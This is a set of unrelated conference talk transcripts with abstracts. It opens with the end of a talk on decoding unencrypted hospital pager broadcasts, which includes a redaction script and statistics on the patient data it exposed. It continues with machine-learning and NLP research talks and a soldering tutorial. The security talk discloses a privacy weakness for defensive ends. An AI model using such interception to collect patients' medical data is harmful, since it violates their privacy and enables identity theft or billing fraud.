It resulted in 52 files — only 28 megabytes worth of data. And remember what I was looking for in the beginning? I was trying to figure out, hey, is this pandemic real? I didn't know anybody that had it. I didn't know if it was in our hospitals. So I really just wanted to trust the data and see for myself. I was really concerned about the whole "do we have enough beds, PPE" and shortages question, and I wondered if there was data that would support that or give me a number.
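If you ever run a decoder like this yourself, redact before you store anything. A minimal sketch — the field labels follow the dissected example above, real messages will vary, and the function names are my own:

```python
import re

# Field labels modeled on the dissected bed-request message above;
# real pager traffic formats vary by hospital and paging system.
PII_PATTERNS = [
    (re.compile(r"(LAST NAME:\s*)\S+", re.I), r"\1[REDACTED]"),
    (re.compile(r"(FIRST NAME:\s*)\S+", re.I), r"\1[REDACTED]"),
    (re.compile(r"(AGE:\s*)\d+", re.I), r"\1[REDACTED]"),
]

def redact(message: str) -> str:
    """Strip obvious patient identifiers before logging aggregate stats."""
    for pat, repl in PII_PATTERNS:
        message = pat.sub(repl, message)
    return message

def is_covid_related(message: str) -> bool:
    """Cheap filter used to bucket messages for counting, not diagnosis."""
    return bool(re.search(r"\bCOVID\b", message, re.I))
```

Counting `is_covid_related` hits on redacted messages is how you get aggregate numbers without ever keeping anyone's name on disk.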
I wanted to know if it's affecting my community, and I wanted to know: is anybody out there doing this right and sending these messages securely? And I got answers to all of these, really. This is what a basic pager text message looks like, and here's some of the information we got. So hospital bed requests — they include COVID results. You can see over here: COVID positive, COVID positive. They came from a couple of different systems. This one came from an XT system; this one over here is from an RTM system. So you can see here, I've redacted all the information, so I'm not distributing personal information. This is a generic Patricia — she's an 84-year-old female, COVID positive — and this one, "Zaro," is a 45-year-old male who has been diagnosed with COVID-19. They even put additional comments in here. This is what COVID is known as: acute hypoxic respiratory failure. You see this pretty readily come across the stream. You see EMS fire runs, which give you a little more data on things that are happening outside the hospital. In this particular instance, someone was brought in because they smoked weed and drank some shots, but they were asked about COVID and were negative on the COVID questions. So that comes across the stream. You get a lot of nurse-to-doctor communications going on over the pagers. You've got ICU admissions — you can find out details there. They're broadcasting that this person was intubated on three pressors. There are even questions where they want to discuss options with hydroxychloroquine and ribavirin, and then they have phone numbers there. There are a lot of questions going back and forth. You also see these nurse-to-doctor communications regarding ventilator data. Basically, everything they talk about on the news is being broadcast through these pager messages in plain text. There's a lot of this coming across the stream. Over 52 days, there were 17,286 tones decoded that turned into these types of text messages.
Of those, 1,852 were bed requests with that HIPAA-protected information included that should not have been there. There were 2,077 diagnoses. Of those diagnoses, 1,219 were COVID related — that includes negatives and positives, or even COVID questions. I just put these on here for comparison: there were only 78 fracture related, surprisingly only 67 cancer related, and 300 chest pain. So you see an uptick in chest pains with COVID — that was one of the filters in the data, too. The average age of patients with the virus was about 72 within that tower's coverage. Like I said, there are towers across the United States everywhere that are broadcasting this, so it will vary from place to place. Also, I did get an answer to that final question: is anyone doing it securely? I found that a few — I think it was 11% — of the messages actually were sent securely. Obviously, there are a lot of attack vectors with this kind of information, from embarrassment to identity theft, to billing scams, disrupting supply chains, and misrouting patients — that last one would require spoofing communications, which we are not doing here; we're just receiving these things out of thin air. But there are a lot of drug-interaction text messages where it says, hey, should they take this, text me yes or no. And that seems dangerous, especially over unencrypted communications, which comes down to life safety in general. And that's why this practice of using pagers in hospitals just really needs to stop. So how does this happen? It appears that no one's doing this intentionally. It's part of a system. There are a lot of these different patient management systems that hospitals use. This one looked like it came from TeleTracking XT — they talk about IVRs, which are systems that help hospitals manage patients — and even on the TeleTracking website they talk about details being sent to the employee's pager. Keep in mind that's not their fault. This is just their software.
You can implement these pager communication systems properly with encryption, like we saw back here — see, this one was secure. But it's really up to the hospital and their service providers. It may not even be the hospital's fault; they may contract it out to a telecommunications service provider who is just using the wrong type of pager network rather than the secure one. I also found, though, that these systems are tracking this exact same data and providing it back to the hospital at an enterprise level. So the heart of the data is the pager data, and then you can create these dashboards. They're actually doing what I was trying to do, but they're doing it within the hospital. And you can see it's very valuable information for the hospitals — it just needs to stay within the hospital, right? So what answers did I get? Yes, this is real. It's happening. I saw EMS run confirmations. The symptoms match. From most bed requests, it seemed bed levels were okay — I didn't see a lot of messages where people were worried about that, but that was just my area; I'm sure it's a problem in other places. I was able to see in my community that the older population was more affected. And I was also able to answer the question of whether there was much security here — and there was not. Only 11% of the messages were actually secured and encrypted. And in no way did I try to decrypt them — that would have just been pointless when you have thousands upon thousands that are not encrypted. So where do we go from here? Healthcare providers need to do this stuff, and I've been in the industry, so these are the questions that some of these roles need to ask. I won't go through all of these, but: CIOs need to allocate budget. IT needs to ask some questions. Auditors, start auditing these pager networks, please. Lawyers, start asking questions. Reporters, spread this information and this talk so we can have these conversations about the healthcare system.
And patients — you can ask your providers about their pager system security if you see your doctor wearing one. CIOs just need to listen to the security community. Please don't say this is a sophisticated attack, because it's not at all — it's super easy. We just need to upgrade the security in these systems. And the healthcare providers just need to keep up the good fight: let IT deal with this, and keep doing what you're doing, because we're all thankful for everything that you do. All right. Thank you. I think my time is up. Thanks again, everybody, for listening. If you want to hit me up on Twitter, you can reach me at @waveguide. We're on the Discord link right here — I'll be doing Q&A right now. So talk to you soon, and hopefully see you next year. Thanks.
When a wireless engineer decides to tune into hospitals to determine the state of COVID in the community, he finds detailed patient info being broadcast into thin air. By capturing, decoding, and analyzing the info, the true state of the pandemic is realized.
10.5446/50456 (DOI)
because it's in the multimodal area. And it's joint work with Shaman, Orishi, Jens and Maria, all my colleagues from the University of Bonn. Specifically, what we focused on here is multimodal classification, and the use of multiple objectives is the contribution. So what I'll do in the presentation is I'll just go through multimodal classification and introduce the task. Then we'll talk a little bit about the main challenge that we've found in this particular area. Then we'll talk about our approach and how we tackle this problem, and then we'll look at some results and a conclusion. So multimodal classification — what is it? Very simply put, that's where you have a classification problem where your inputs are in more than one modality. Very typically image and text, because a lot of web data tends to come with these two modalities. So you have lots of different bimodal and multimodal classification tasks out there, such as, for example, source detection of news articles. So imagine the Washington Post, the Guardian, and six or seven other news sources: you can classify the articles, based upon the types of images and the tone of the articles, as belonging to one of those sources. You can also do event detection — that's a typical example. You may have events such as protest marches or sports events, and then again you take your articles, or whatever items you have, and you classify them along those criteria. So the specific task that we're looking at in this paper is built upon IMDb — so it's movies. And what they did is they took the typical movie plots that you have on IMDb and added posters along with those movies. So on the right-hand side at the bottom, you have an example here. We have a movie called Blaise Pascal — I haven't seen the movie, but the topic sounds very interesting. The plot summary here is actually fairly short, but some of the summaries are much longer than this.
And then you have two genres, which will be the classes — in this case, biography and history. It's important that there are two genres, because what we're talking about here is specifically multi-label classification. So we have 23 of these different classes, and what's important to stress is that you can have a title which has more than one label. So something can be, for example, both black-and-white and a drama, and in this case it can be both biography and history. So it's multi-label classification. A typical pipeline for multimodal classification is mapped out at the top of this slide, and it's a very typical kind of framework. So we have, in this case, image and text inputs. You make some embeddings; then typically you have some way of combining your modalities — in this case, the baseline model we took used a multimodal fusion process — and then you have some sort of classification going on based upon those fused inputs. Now, the key challenge is that when training on multimodal data, you tend to have a very high number of parameters in these systems, and this very easily leads to overfitting. So what we did is we took the baseline system, which is based upon that top figure, and we included some regularization methods — in this case batch norm and max norm, which reduce variance within the system — and we excluded those methods to see the impact that regularization has on this system. As you can see, it's quite dramatic. These are the validation curves, and the validation curve without regularization already starts to trail off at about epoch 7. So regularization is a major, major challenge within multimodal machine learning. So now I'll move on to our particular approach to tackling this problem. First of all, just going back to this pipeline: the baseline system is fairly typical in that you have one loss function, or objective, to train the whole of the system.
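Before moving on to the losses, the max-norm regularizer just mentioned can be made concrete. This is a generic plain-Python illustration, not the authors' PyTorch code: each weight row is rescaled whenever its L2 norm exceeds a cap c, which directly bounds how far the parameters of an over-parameterized fusion layer can drift:

```python
import math

def max_norm_(rows: list[list[float]], c: float = 3.0) -> list[list[float]]:
    """In-place max-norm constraint: clamp each weight row's L2 norm to c.
    Rows already under the cap are left untouched."""
    for row in rows:
        norm = math.sqrt(sum(w * w for w in row))
        if norm > c:
            scale = c / norm
            for i in range(len(row)):
                row[i] *= scale
    return rows
```

In a training loop this would run right after each optimizer step, so the weights can never accumulate the large magnitudes that drive the overfitting curve shown on the slide.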
That single objective, in this case, is binary cross-entropy, which is a standard loss function for multi-label classification. What we decided, first of all, was to introduce two different loss functions. So within the multimodal fusion part of the process we introduce one loss function, and then we stick with the binary cross-entropy loss function for the classification part of the pipeline. What's interesting here is that the particular method, or loss, that we introduced into the multimodal fusion part of the pipeline is called the ELBO, and that's an instance of variational inference, which is a technique that is very common in probabilistic machine learning. And what's unusual here is that you don't tend to get systems which combine probabilistic machine learning approaches with deterministic machine learning. It has happened, but it's fairly unusual — and specifically when you're training the whole of the system simultaneously, it is very, very unusual indeed. In fact, we couldn't find an example of multimodal classification being done in this way. So what you do with probabilistic machine learning is that you turn — in this case — the weights and biases of your layers into distributions. So as opposed to having just one number, or point estimate as it's termed, for a particular weight, you make a distribution for it, and then you can sample from that distribution. In this case, we chose Laplace distributions, which are particularly good for highly heterogeneous data — because remember, what we're dealing with here is text and images, which are very different from each other. And then, as is standard in variational inference, you apply the evidence lower bound, or ELBO as it's termed, which is the most typical loss function. If you imagine it, you have two distributions and you're just minimizing the divergence between them — minimizing the KL divergence with gradient descent. That's just a standard kind of setup.
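The two pieces of that objective are easy to write down. Below is a sketch in my own notation, not the paper's code: the closed-form KL divergence between two Laplace distributions — the penalty the ELBO puts on each weight's posterior against its prior — plus the negative ELBO that gradient descent would minimize, with a weight β on the KL term that a KL-annealing schedule can ramp over training:

```python
import math

def kl_laplace(mu1: float, b1: float, mu2: float, b2: float) -> float:
    """Closed-form KL(Laplace(mu1, b1) || Laplace(mu2, b2)).
    Zero when the two distributions coincide, positive otherwise."""
    d = abs(mu1 - mu2)
    return math.log(b2 / b1) + d / b2 + (b1 / b2) * math.exp(-d / b1) - 1.0

def negative_elbo(log_likelihood: float, kl_terms: list[float],
                  beta: float = 1.0) -> float:
    """ELBO = E[log p(x|z)] - beta * KL; we minimise its negative.
    beta is the knob that KL-annealing schedules adjust."""
    return -log_likelihood + beta * sum(kl_terms)

def kl_weight(epoch: int, warmup_epochs: int = 10, max_beta: float = 1.0) -> float:
    """One common annealing variant: linear warm-up of beta from 0 to
    max_beta, so the fusion layers fit the data before the KL pressure
    fully kicks in (assumed schedule, not necessarily the paper's)."""
    return min(max_beta, max_beta * epoch / warmup_epochs)
```

The regularizing effect the speaker describes is exactly the β·KL term: a larger β pulls every weight posterior toward the prior, shrinking the effective capacity of the network.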
Now, why we chose this is because we'd observed with these probabilistic methods and loss functions that you could include all kinds of controls to calibrate how the learning was being done, and therefore have much better control over reducing the kind of variance that we saw in this particular chart. So it gives you lots of different ways to take control of that. We built three different versions of the ELBO loss to account for different types of regularization process. We took the standard ELBO, where you're basically maximizing the evidence lower bound; that's ELBO v1. ELBO v2 includes a strategy called Rao-Blackwellization, which unfortunately I haven't got time to go into, but basically you introduce conditional expectations instead of random variables. And then finally, we have one other method, which is KL annealing, which is quite similar to learning rate annealing, if you've ever done that, where you start off with, for example, a very high learning rate and decrease it as you go through the learning process. Same here: the KL divergence within the setup has a kind of regularizing effect upon learning, so what you can do is reduce or increase the impact of that KL divergence as you go through the process, and thereby introduce a high level of regularization to minimize that variance. So the results: first of all, on the far left, we have the result for our top model. In this case, it's using that KL annealing process combined with the standard L2 regularization method. And the advantage is that when you combine these two different methods, you can then train with, for example, much wider layers. You can introduce lots more parameters, because you have a lot more control over the variance that happens in the system. And so the F1 score for that was 0.617 versus 0.608 for the standard baseline system.
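A minimal sketch of what a KL annealing schedule can look like: the weight on the KL term ramps up over training, analogous to learning rate annealing run in reverse. The linear shape and the constants here are assumptions for illustration, not the paper's settings:

```python
def kl_weight(epoch, warmup_epochs=10, max_beta=1.0):
    """Linear KL annealing: ramp the KL weight from 0 up to max_beta.

    Early in training the KL term barely constrains the posterior; its
    regularizing pressure is then increased gradually, epoch by epoch,
    until it reaches full strength at warmup_epochs.
    """
    return min(max_beta, max_beta * epoch / warmup_epochs)
```

The per-epoch value would then multiply the KL term of the ELBO, e.g. `loss = bce + kl_weight(epoch) * kl_sum`.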
On the right, what we've done is we've just taken our best model and trained it with the standard layers, 1024. And so there you can see that what our system is allowing us to do is precisely to introduce more parameters into the system, and that's where the advantage is coming from. So we're controlling variance in a much better way. Now, you'll notice very quickly that there's not much difference in these scores; this is the mean over five complete cycles of training and testing. So we dealt with this challenge of high variance that happens in multimodal machine learning. Our contributions were to introduce that second objective, to have a multi-objective framework with one part of it learning the multimodal fusion process with variational inference. Then we used methods within that framework to regularize, or reduce variance, so we could have much better control of the parameters. And finally, we put this all together into a single architecture within PyTorch, so adapting that framework was another contribution. As for future directions, we want to train systems with not just images and text, but other modalities. And we'd like to include other languages, because the task that we chose only had English; we're working on something just in that space at the moment. And we'd like to extend the probabilistic techniques for representation learning, because we think there's lots more value we can get out of these particular approaches. Just for example, if you have a VAE approach, you can create new samples. So if you have class imbalance, you can create new samples in your underrepresented minority classes. So with that, I'll stop there. Thank you for your time.
We learn about the world from a diverse range of sensory information. Automated systems lack this ability as investigation has centred on processing information presented in a single form. Adapting architectures to learn from multiple modalities creates the potential to learn rich representations of the world - but current multimodal systems only deliver marginal improvements on unimodal approaches. Neural networks learn sampling noise during training with the result that performance on unseen data is degraded. This research introduces a second objective over the multimodal fusion process learned with variational inference. Regularisation methods are implemented in the inner training loop to control variance and the modular structure stabilises performance as additional neurons are added to layers. This framework is evaluated on a multilabel classification task with textual and visual inputs to demonstrate the potential for multiple objectives and probabilistic methods to lower variance and improve generalisation.
10.5446/50454 (DOI)
So, good afternoon everyone. First of all, thank you to all the organizers. It's a pleasure to participate in this workshop. Of course it would be better if we could all be together in CREIT, but we couldn't predict the situation. But again, I'm really happy to share the initiative I have been working on together with my colleagues to create a universal named-entity recognition framework. And also thank you, Osamu Odin, for introducing the NER topic in your presentation. So my PhD research topic concerns multilingual natural language processing pipelines for European under-researched languages, and of course, named-entity recognition and classification is part of it. When I started doing the state of the art concerning these languages, I could see that, compared to other NLP tasks such as part-of-speech tagging and dependency parsing, when we talk about named-entity recognition there are so many different approaches, so many different proposed hierarchies, which makes comparison between languages quite difficult. For example, I think you are all familiar with the Universal Dependencies initiative, which proposed specific rules for part-of-speech annotation, morphological features and syntactic dependencies, but when you talk about named-entity recognition, there's no such thing. So in this table, you can see the work that has been done concerning named-entity recognition, and you can see there's a great variety between them concerning the number of levels and the number of nodes per level. There are some initiatives, such as the ones proposed by the Message Understanding Conferences, MUC, that propose quite specific annotation guidelines, but they are not followed by everyone. And as I said, that makes it quite hard when you try to compare different approaches from a multilingual perspective.
Of course, we can see some similarities between them when you take basic classes such as person, location, organization, but when you compare all these approaches, you can see even very highly complex structures, such as the one proposed by Sekine for English, but also for Japanese. In this slide, I just wanted to illustrate how different two approaches can be. On the left side, you can see the Czech named-entity hierarchy, composed of two levels, one here and the other one here, more complex. And on the right, you can see the Second HAREM, a structure proposed for named-entity recognition in Portuguese. And here, you can even have a third level for a more specific classification. So our idea was to create a universal multilingual named-entity annotation scheme following the work done by Sekine. And why Sekine? Because, from what we have analyzed, it was the most complex one and therefore the most complete, and it fits better the idea of a universal framework. So the first step of our work, and what's presented today, is the analysis of the Sekine hierarchy and the changes we've made so that it could fit our universal idea. And in the second phase, which will be presented in future work, we will use this framework to annotate a multilingual parallel corpus, SETimes. It's composed of news from the SETimes portal for 10 Southeastern European languages plus English. So here is just some information on how UNER was composed. As I said, we checked every Sekine class, we analyzed the structure and we made some changes, like reorganization of some nodes, especially to make it more similar to other works such as HAREM and the Czech named-entity structure. We have also introduced some new nodes, such as personal event and brands, nodes that we found to be pertinent. And we have made a major change in the time expressions node. We divided it into absolute, which covers expressions such as December the 2nd, 1989, and relative, which covers expressions such as last Sunday.
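The absolute/relative split can be illustrated with a toy heuristic. The patterns below are purely illustrative assumptions for English, not the project's actual annotation rules:

```python
import re

# Hypothetical surface cues: absolute expressions tend to name a month or a
# year, relative ones tend to use deictic words anchored to "now".
ABSOLUTE = re.compile(r"\b(\d{4}|January|February|March|April|May|June|July|"
                      r"August|September|October|November|December)\b", re.I)
RELATIVE = re.compile(r"\b(last|next|this|yesterday|today|tomorrow|ago)\b", re.I)

def time_expression_type(text):
    """Classify a time expression as 'absolute', 'relative', or 'unknown'."""
    if ABSOLUTE.search(text):
        return "absolute"
    if RELATIVE.search(text):
        return "relative"
    return "unknown"
```

Real annotation tools are of course far richer than this, but the sketch shows why the two classes are separable: one is anchored to the calendar, the other to the moment of utterance.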
Here in this table, you can see the description of the UNER hierarchy. So we have five levels: level zero is the root, from which all the other nodes derive, and level one has three different nodes: name, time expressions and numerical expressions. And the name node contains the other classic named-entity classes, such as person, location, organization. In this slide, I know you can't see anything; it's for you to have a glance at how the UNER structure looks. It's quite complex. The first big block is the name node, this one is the time node, and this one is the numerical expression node. This version is version 1.0 and it's available at this link. You can also find the link in the published paper. Please go check it, and as I told you, this is the first version, so all your comments are welcome; they will help us when we release enhanced versions of UNER. Just some words about the perspectives before I finish my presentation. As I said, the next step will be the annotation campaign. We have started it, and we have two different approaches. For the name node, we are using automatic annotation based on Wikipedia data. And for time and numerical expressions, we will annotate the English SETimes corpus with existing tools and then propagate from the English corpus to the other parallel corpora in SETimes. And of course, once we've conducted these annotation campaigns, we will evaluate the quality of the automatic annotation by using crowdsourcing campaigns to analyze random sentences and check how well the annotation is done, and also train models using the UNER-annotated SETimes datasets and check how well they can do this task of very complex named-entity recognition and classification. And here are some references. Thank you very much.
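As an illustration of how a multi-level hierarchy like this can be represented and queried, here is a toy fragment. Only the level-1 nodes named in the talk are taken from UNER; the deeper node names are examples, not the published v1.0 label set:

```python
# Illustrative fragment of a UNER-style hierarchy as nested dicts.
UNER_FRAGMENT = {
    "Name": {
        "Person": {},
        "Location": {},
        "Organization": {},
    },
    "Time-Expression": {
        "Absolute": {},   # e.g. "December the 2nd, 1989"
        "Relative": {},   # e.g. "last Sunday"
    },
    "Numerical-Expression": {},
}

def label_path(tree, target, path=()):
    """Return the root-to-node path for a label, or None if absent."""
    for node, children in tree.items():
        here = path + (node,)
        if node == target:
            return here
        found = label_path(children, target, here)
        if found:
            return found
    return None
```

A path lookup like this is what lets annotations at a fine-grained level (say, a relative time expression) be collapsed back to coarser levels for cross-lingual comparison.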
We introduce the Universal Named-Entity Recognition (UNER) framework, a 4-level classification hierarchy, and the methodology that is being adopted to create the first multilingual UNER corpus: the SETimes parallel corpus annotated for named entities. First, the English SETimes corpus will be annotated using existing tools and knowledge bases. After evaluating the resulting annotations through crowdsourcing campaigns, they will be propagated automatically to other languages within the SETimes corpora. Finally, as an extrinsic evaluation, the UNER multilingual dataset will be used to train and test available NER tools. As part of future research directions, we aim to increase the number of languages in the UNER corpus and to investigate possible ways of integrating UNER with available knowledge graphs to improve named-entity recognition.
10.5446/50455 (DOI)
Next, we will have a brief introduction. Then we will go through the purpose of the paper, the dataset used, methodology, evaluation, and conclusion. In the new digital era, information is available in multiple modalities, like image, video, audio and text, and in multiple languages all over the world, specifically news, which affects our daily lives. Multimodal news analytics is useful for industries to understand market needs and improve their financial status, and for people to search for their desired news. News is available in multiple domains, like sport, health and politics, and in different modalities, which makes it difficult to analyze. So intelligent technologies are needed to process the multimodal contents of news to extract the useful information. The purpose of this paper is to analyze multimodal features for news retrieval. To this end, we utilize different multimodal feature extractors on collected news and study the impact of existing state-of-the-art feature extractors for text and image on the retrieval task. We use an unsupervised method and run the experiments in multiple news domains for German and English. For the collected dataset, we extract news articles from five domains, such as politics, health, environment, sport, and finance, for 25 different events, for example Brexit and coronavirus, with a maximum of 20 news articles per event, in two languages, English and German. We have 348 articles for English and 263 for German. As shown in this example, each news article contains a title, body text, and image. The next step is to extract multimodal features. For images, we use different variations of one of the most well-known deep models, ResNet, so we have three different descriptors. The object descriptor is trained on ImageNet and focuses on visual features of objects in images. The place descriptor is trained on the Places dataset, giving scene features of the images.
And the location descriptor covers broader domains than the place descriptor, such as indoor images, and extracts their location information. For text, we use two descriptors. One is BERT, which converts text to vectors of numbers, considering the context of the text. And the other descriptor that we use is the entity vector, for which we use spaCy to extract named entities and a Wikipedia-based named-entity linking tool to disambiguate them. Doing this for the whole dataset gives us a dictionary of entities. Finally, we convert each text to a one-hot vector according to the existence of each entity in the text. For the retrieval task, first the mentioned features are extracted for the whole dataset for both languages, English and German. Then each article is considered as a query, and the rest are considered as reference articles, which will be retrieved. For each article, reference articles are ranked based on cosine similarity with respect to each of the features. So the goal is that articles which are in the same event category as the query should be ranked at the top. For the evaluation, we use average precision, as you see in the formula, where R means recall and P means precision. For each query in the retrieval, eight different formulations are considered, including individual visual and textual features, combined single-modality features, for which we average the features, and multimodal features, where we average all the textual and visual features. Average precision is computed for all the queries regarding the relevance of the ranked list of the retrieved news, and then averaged for each domain, or more specifically each event. In this table, an investigation of different features and different domains for English and German news is shown. Yellow columns and highlighted numbers show average precision for combined textual features and combined visual features for English, and the green box shows the same for German.
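The retrieval and evaluation steps just described can be sketched as follows. This is a simplified illustration: the real system ranks on high-dimensional ResNet/BERT features rather than these toy vectors:

```python
import math

def cosine(u, v):
    """Cosine similarity between two feature vectors."""
    dot = sum(a * b for a, b in zip(u, v))
    nu = math.sqrt(sum(a * a for a in u))
    nv = math.sqrt(sum(b * b for b in v))
    return dot / (nu * nv) if nu and nv else 0.0

def average_precision(query, refs, relevant):
    """Rank refs by cosine similarity to the query and compute AP.

    `relevant` is the set of reference indices belonging to the same event
    as the query; AP averages precision at each rank where a relevant item
    appears, which rewards placing same-event articles near the top.
    """
    ranking = sorted(range(len(refs)),
                     key=lambda i: cosine(query, refs[i]),
                     reverse=True)
    hits, ap = 0, 0.0
    for rank, i in enumerate(ranking, start=1):
        if i in relevant:
            hits += 1
            ap += hits / rank   # precision at this recall point
    return ap / len(relevant) if relevant else 0.0
```

Averaging this score over all queries of an event, and then over the events of a domain, gives exactly the per-event and per-domain numbers discussed in the tables.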
As illustrated, textual features are better descriptors than visual ones, as you can see from the highlights, since in English they outperform in four domains and are equal to visual in one domain, and for German they outperform in three domains. The reason for the different results between the two languages is that the named-entity recognition tool that we use for the textual features is not as good for German text as it is for English, and we will see this in more depth in the next table. Here you see that, among all combined features, multimodal features are the best descriptors. For German, it is obvious, because they outperform in three of the domains, as shown in the green highlights. For English, even though visual features are not better than textual features in any of the domains, they help improve the performance when combined with textual features for some domains like environment and health, as shown in the red boxes, which are improved by 10%. In this table, you see further information, which presents a more in-depth investigation of different features for different events and different domains. Each row shows results for each event in its corresponding domain. For example, in the environment domain, palm oil production in Indonesia, and in finance, the Volkswagen emissions scandal. The first three columns show average precision using textual features, the next four columns show visual features, and the last column shows combined multimodal features. The best feature for each event is highlighted in green. As the blue boxes on the table show, multimodal features are the best descriptors and outperform in 11 events in total. The red boxes show that in these cases, where multimodal outperforms, visual features help improve the textual ones, despite not performing well individually, as we saw in the previous table. In the politics and finance domains, in most events, textual features outperform multimodal. The reason is that these domains do not have location and object clues.
Besides, the richness of the text is another reason, because these events include specific entities that make them unique, such as Volkswagen and Brexit. Here, the blue boxes show that entity features outperform all individual features, underlining the fact that named entities are of high importance in news analysis. So, what is done in this paper? We analyzed the impact of different features for multimodal news retrieval. We proposed an unsupervised approach for news retrieval on 25 events extracted from five different domains for English and German. What's the outcome? Multimodal features outperform individual textual and visual features. More visual descriptors, such as face recognition, are needed for some event categories, such as politics and sports. And the textual feature of entity overlap outperforms the other individual features. As future work, we can apply these types of methods with an increased set of features and extend the dataset to more domains and languages. That's it. Thank you for your attention.
Content-based information retrieval is based on the information contained in documents rather than on metadata such as keywords. Most information retrieval methods are either based on text or image. In this paper, we investigate the usefulness of multimodal features for cross-lingual news search in various domains: politics, health, environment, sport, and finance. To this end, we consider five feature types for image and text and compare the performance of the retrieval system using different combinations. Experimental results show that retrieval results can be improved when considering both visual and textual information. In addition, it is observed that among textual features entity overlap outperforms word embeddings, while geolocation embeddings achieve better performance among visual features in the retrieval task.
10.5446/50653 (DOI)
Hello friends, Joe here from HackerBoxes. Today we're going to learn how to solder. And we're going to learn to solder using this cool little kit, which we call a badge buddy. It has some blinking LEDs and a battery and a switch. So not many components. It's pretty easy to make. It's a nice first start if you haven't soldered before. So first let's talk about what soldering is. Soldering is just melting solder, which is an alloy, a metal alloy that has a very low melting point. So we melt the solder using a soldering iron, a tool like this, and we melt it between things that we want to connect together, usually connecting them electrically, although we will discuss that there's more to it than that. We see things that are soldered all the time, and the entire world around us is full of electronic gizmos that have components soldered onto circuit boards. So it's a big part of our lives whether we stop and think about it or not. Being able to solder is a really nice skill to have because you can repair things, modify things, connect wires to things, read data in and out of them. It's a really excellent hacker skill, a nice DIY skill. Once you get into it you'll find that it comes in handy a lot, and it's one of these skills that you can apply to a lot of different things. So all right, I thought I would start by just saying, big picture, there are two things that we want to keep in mind that are really important. The first one is pretty obvious, and it's almost sort of a joke; you've probably seen these pictures online. This is a soldering iron. It's off, obviously. If it smells like chicken, you're holding it wrong. Okay, always hold the rubber handle. So that's the first big-picture item. The next big-picture item is to realize that you always need more solder.
And I don't mean by that that you need to go out and always buy more solder because you need to have lots of solder, but when you're working on something that needs to be soldered, you'll find initially that you generally need more solder than you think you need. And when something isn't working right, you need to add more solder to it. And sometimes that's counterintuitive, especially when we're trying to unsolder something. Adding more solder is a vital part of unsoldering. So just keep those two things in mind. The first one's obvious; the second one can be a little counterintuitive. If it smells like chicken, you're doing it wrong. Number two, you probably always need more solder. Just don't be afraid to add more solder. So, solder serves three purposes. I think this is one of those important things, because there's some subtle importance to these three different jobs, and they're different. And contained in the fact that these are three separate jobs of the solder are some of the common problems that people have as they're getting into soldering. So the first one is almost obvious: solder mechanically connects two things. So it's almost like glue; you're almost using it like a hot glue. You melt it between two things and it connects them. But is that enough? Certainly not, because really often the main point of the solder, aside from just holding two things together, is that you have to have a good electrical connection: something that current will flow through, not something that will easily break apart, and not something that actually has small gaps in it. So if you go at it thinking, I just need to get these two things stuck together like glue, and you don't think about needing to have that really nice electrical bond, you might be missing something. And the third thing is the part that's a little subtle, the part that people often miss in the very beginning.
And usually this is one of those things where, when you get this, your soldering game goes up to the next level. And that's that one of the jobs of the solder is actually to be a thermal conductor. And what I mean by that is, well, there are two different ways that that's true, but the one that's really important is that it is the solder that allows heat to flow from the soldering iron onto the work. Okay, so if you don't have solder in play before you even start soldering, in other words, if your tip isn't tinned, if you don't have solder on the pieces of work, meaning the wire and the pad or whatever it is you're trying to solder together, there won't be a thermal conduit for heat to go from the tip of the soldering iron into the work, which is really what you want, as we'll discuss. So just remember that part of the job of the solder is to actually be a thermal conductor. Okay, so it's a mechanical bond, it's an electrical conductor, but it's also a thermal conductor. And the second way in which it's a thermal conductor is in some instances where you have components that get warm while they're operating, maybe, let's say, a linear regulator or something. It being bonded with solder onto a PCB or some other substrate can allow the thermal energy to flow out of it to keep it cool so it doesn't overheat. So that's kind of a secondary way, but what I'm really talking about when I say this subtle thing about thermal conduction is that while you're soldering, you need the solder to help do the soldering. Okay, it isn't just a glue; it's actually a conduit for making the connection. All right, so try to keep that in mind. So let's talk about some of the tools and supplies that we use in soldering. The first obvious one is a soldering iron. So the really cool thing about soldering irons is that in the last 15 years or so, the price profile of soldering irons has changed quite a lot.
Now, for a price that would have been unheard of 20 or 30 years ago, meaning even as little as 20, 30, 40 dollars, you can get a very nice soldering iron. The soldering irons that I came up wishing I could have had, I only had access to in a lab, because they were $250. Now we get soldering irons all the time that are in the $20 range and of similar quality: controllable temperature and very nice tips that stay clean for a very long time. So that's a nice thing: soldering irons are readily available now and they're not super expensive. I mean, you can still spend a lot of money on a really nice soldering iron, but generally what you really want is just one that has a nice quality tip that's replaceable, although you'll find you might not actually need to replace it very much if it's a nice tip, and you need to be able to adjust the temperature, because there are times when you want a little more heat on the tip or a little less heat. You also just don't want it to always be some preset random amount. So really inexpensive soldering irons don't have a temperature adjustment. All right, and another tool, or part of a tool, you'll need is something to clean the tip of your soldering iron, because you have to keep it clean all the time. If you're thinking always clean the tip, or constantly clean the tip, you'll end up cleaning it a lot, which is what you really need. You need to clean that tip very, very frequently while you're using it. It's not just something you do at the very end while you're putting it away. So, most soldering iron stands come with a little sponge, a SpongeBob square sponge like this, that sits at the bottom of the stand. Just get that wet.
Some people keep a little bottle, like a little drinking water bottle, next to their soldering station so they can always keep that sponge wet without having to run off to the sink. That's fine for when you're starting out: just rub the tip of your iron on that sponge frequently, almost every time you put the soldering iron down or pick it up; just constantly be cleaning it. And then as you get a little more into soldering, kind of a style-point tool is one of these little shaved-metal tip cleaners. These are pretty nice; let me make sure to get this on the camera right here. You just kind of stab the soldering iron into it, scrape, scrape, scrape, and it scrapes the tip of the soldering iron. You can just do that frequently while you're using it. Every time you go to set the soldering iron down or pick it up, just kind of stab it in there a couple of times. So the nice thing about the metal one, which is almost like a little Brillo pad, is this: I think they're usually made of brass, and it's like metal wool. People call it metal wool or steel wool; it's not technically steel wool, but with these types of cleaners, because they're not wet, they don't conduct as much heat away. So that's really good. Yeah, so those are probably the main tools you need. It's also nice to have some flush cutters, like these little guys, which are really very tiny, and one side of them is flat, so you can cut wires off flush to a circuit board. At some point, you will want to be able to remove the residue that's left on a circuit board after you solder it. This is called cleaning the flux, so you'll want a flux cleaner, or a lot of people just use rubbing alcohol, isopropanol, and a little very stiff brush, an acid brush, to just clean the back of the board.
